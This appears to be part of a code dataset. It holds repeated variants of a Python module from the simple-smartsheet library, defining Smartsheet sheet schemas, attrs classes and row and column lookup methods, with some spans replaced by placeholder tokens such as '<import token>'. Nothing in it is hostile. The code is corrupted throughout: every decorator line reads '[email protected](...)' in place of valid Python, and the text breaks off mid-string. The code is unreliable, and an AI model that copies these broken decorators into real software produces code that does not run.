\"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n\n\nclass UserSettingsSchema(Schema):\n <assignment token>\n <assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserSettings(Object):\n critical_path_enabled: bool\n display_summary_tasks: bool\n\n\nclass UserPermissionsSchema(Schema):\n summary_permissions = fields.Str(data_key='summaryPermissions')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserPermissions(Object):\n summary_permissions: str\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserSettings(Object):\n critical_path_enabled: bool\n display_summary_tasks: bool\n\n\nclass UserPermissionsSchema(Schema):\n summary_permissions = fields.Str(data_key='summaryPermissions')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserPermissions(Object):\n summary_permissions: str\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass UserPermissionsSchema(Schema):\n summary_permissions = fields.Str(data_key='summaryPermissions')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserPermissions(Object):\n summary_permissions: str\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass UserPermissionsSchema(Schema):\n <assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserPermissions(Object):\n summary_permissions: str\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n 